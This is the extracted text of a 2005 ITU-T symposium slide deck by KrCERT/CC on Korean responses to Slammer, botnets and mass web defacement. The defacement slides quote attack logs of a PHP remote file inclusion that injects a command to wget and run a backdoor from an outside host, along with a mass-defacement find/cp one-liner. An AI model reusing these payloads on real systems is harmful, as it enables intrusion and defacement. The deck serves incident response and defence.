Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science
  3. Networking

The countermeasure against two security issues in Korea HyunCheol Jeong KISC / KrCERT/CC

advertisement 
International Telecommunication Union
The countermeasure against
two security issues in Korea
HyunCheol Jeong
KISC / KrCERT/CC
Korea Information Security Agency
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
Contents
ITU-T
o Slammer in Korea
o PC Survival Time
o Limitation of Reactive CERT
o Role of KISC
o Nowadays Security Issues in Korea
o Bot/BotNet
o Web Defacement
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
2
Slammer in Korea
ITU-T
o Internet collapse by Slammer
• About 8,800 Servers were infected
• Too fast : 1M~5M UDP Packets/Sec
• International Gateway was bottle-neck
• 99% worm packets rushed to international gateway
Slammer Worm
1W
2W
3W
4W
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
5W
3
PC Survival Time
o PC survival time is too short
ITU-T
• 90% PCs are infected in 1 hour
Win 2K SP4(30PCs)
Win XP SP1(30PCs)
Average
MIN
MAX
Win XP SP1
13min 5sec
8sec
95min 42sec
Win 2K SP4
20min 52sec
1min 37sec
97min 12sec
Tested in our HoneyNet(Jan. 2005)
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
4
Limitation of Reactive CERT
ITU-T
o Most CERTs are focused on Reactive Services
• Incident Handling, Vulnerability Handling,
Artifact Handling
o So, CERTs gather information in a PASSIVE
way
• Report us after incidents happened
o We can’t respond rapidly against nowadays
worm
o How CERTs will be able to gather real-time
information and DO monitoring?
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
5
Role of KISC
ITU-T
o KISC : Korea Internet Security Center
• Established on Dec. 2003 after slammer worm
o KISC can do following things by the Law
• ISP/IDC inform us traffic status & incident information
• We can recommend ISPs to block specific malicious traffics
• We can request audit trails to ISPs for analysis
• But, No authority for investigation
o KISC runs a watch center which can monitor the Korean Network in
real time.
o Hotlines between KISC, ISPs, IDCs, Vendors and Related
Organizations
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
6
Role of KISC
ITU-T
Detect
Detect
ISP/ESM
Propagation
Propagation
Mail
m
or .
W etc
D
Major ISPs
&
MSSP
Analysis
Analysis
ISP
ISP Hot
Hot Liners
Liners
Remote Agent
IDS/Firewall
KISC
FAX
Private
Private Sectors
Sectors
Vul.
Foreign Ptn
gn
ei
r
Fo fo.
In
In
No
Re cid
tif
ica
po en
rt t
tio
n
Notice Mail
SMS
Web.
Home
Home Users
Users
S/W,H/W
AV/Vaccine
Messe
nger
Analysis
Detect
KISC
Propa
gation
Press
Press && TV/Radio
TV/Radio
TRS
Recovery
User
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
7
Nowadays Security Issues in Korea
ITU-T
o Mixed Attack
• Worm, Virus, Trojan, Backdoor, …
o Hacking for Not curious But Money
• Phishing, Spyware, Spam, …
o Information Security also important
• Bot/BotNet, Web defacement
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
8
Bot/BotNet
o Bot = Worm + Trojan + Backdoor
ITU-T
o BotNet is a Army for cyber crime
o Korea is major Target
(So many Korean PCs are infected)
• Because our high-speed network & about 30M PC users
Attacker
3. Control
Bot C&C(IRC Server)
1st Response
1. Install Bot with hacking
2. Connect to malicious Bot C&C
Infected PCs
2nd Response
4. Cyber Crime
(Information leakage, DDoS, Spamming, …)
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
9
Bot/BotNet
ITU-T
o 1st Response : Bot C&C
HoneyNet
er
erv
S
stic
e
m
Do
Bot C&C Information
Domain name
Foreign Information
(nsp-sec, FIRST, …)
Bot C&C DB
Share with ISPs
IP
Ad
dre
ss
Vaccine Vendor
DNS
DNS Sinkhole
Sinkhole
zone "irc.bot.net" {
type master;
file "/etc/db.badname";
};
------------------------IN A 127.0.0. 1
Remote
Remote Trigged
Trigged
Blackhole
routing
Blackhole routing
ISPs
ip route 111.111.111.111
255.255.255.255 Null0 Tag 66
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
Bot
Bot C&C
C&C
Incident
Incident Handling
Handling
10
Bot/BotNet
ITU-T
o 2nd Response : Prevention & Response from
Bot Infection
• It’s most important but difficult
• Too many PCs Infected and not controlled
• Infected PCs can be find with DNS sinkhole &
network flow monitoring
• Windows XP release & Bot remove campaign
(Jun. 2005)
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
11
Web Defacement
ITU-T
o Over 7,000 Korean Web Sites were defaced (Dec 22,
2004 ~ Feb 1. 2005)
• Many Web hosting servers were attacked
• Attacked by PHP based web bulletin-board vul.
7000
6,478
# of web defacement in Korea
6000
5000
4000
3000
2000
1000
0
38
2004.1.
280
127
2004.2.
2004.3.
339
337
2004.4.
2004.5.
172
262
423
2004.6.
2004.7.
2004.8.
709
335
756
1,034
2004.9. 2004.10. 2004.11. 2004.12. 2005.1.
<Source : www.zone-h.org>
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
12
Web Defacement
ITU-T
o Scenario of Mass Web Defacement
Information Gathering
Gain Web Server privilege
with PHP Vulnerability
Gain root privilege
with local exploit
find /home/data -name "index.*" -exec cp /tmp/index.html {} \;
Mass defacement
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
13
Web Defacement
ITU-T
o Attack Logs
access_log
/zboard/include/print_category.php?setup=1&dir=http://www.xx.xx.xx.xx.com.xx/newcmd.gif?&cmd=id HTTP/1.1" 200 4220
? execute remote code and check the websever owner
/zboard/include/print_category.php?setup=1&dir=http://www.xx.xx.xx.xx.com.xx/newcmd.gif?&cmd=cd%20/tmp%20;%20wg
et%20http://nickvicq.xxx.net/BD/r0nin HTTP/1.1" 200 4892
? download backdoor program
/zboard/include/print_category.php?setup=1&dir=http://www.xx.xx.xx.xx.com.br/newcmd.gif?&cmd=cd%20/tmp%20;%20ch
mod%20777%20r0nin%20;%20./r0nin HTTP/1.1" 200 4204
? execute backdoor program
Port listening on TCP/1666
Connect through backdoor port
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
14
Web Defacement
ITU-T o Countermeasure against Web Defacement
• Guide for Secure Web programming
• Web Application Vulnerability Patch
Develop
Patch
Patch Release
Web Developer
Vul.. Info
Vul
Consult for
Patch
Patch
History
Web Vulnerability
Info. Share
Web Operator
se
lea
e
R
o.
ide . Inf
u
G
l
Vu
Vul. Info.
Vul.
Assist for Patch
KrCERT/CC
Web vul
vul.. DB
Vul.. Info
Vul
Web patch history DB
Develop Guide
Foreign Web Site
Web Security Expert
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
15
ITU-T
o Thank you !!
o http://www.krcert.or.kr
o hcjung@kisa.or.kr
ITU- T Cybersecurity II Symposium
29 March 2005, Moscow, Russian Federation
dates
16
Related documents
IETF Security Work Magnus Nyström Technical Director, RSA Security
IETF Security Work Magnus Nyström Technical Director, RSA Security
Contemporary threats and integrated approach to information security Garry Kondakov
Contemporary threats and integrated approach to information security Garry Kondakov
ITU-T Final Report Cybersecurity Symposium II
ITU-T Final Report Cybersecurity Symposium II
ITU-T Final Report Cybersecurity Symposium II
ITU-T Final Report Cybersecurity Symposium II
BIO ITU-T Workshop “Opportunities & Challenges in Home networking”
BIO ITU-T Workshop “Opportunities & Challenges in Home networking”
Download
advertisement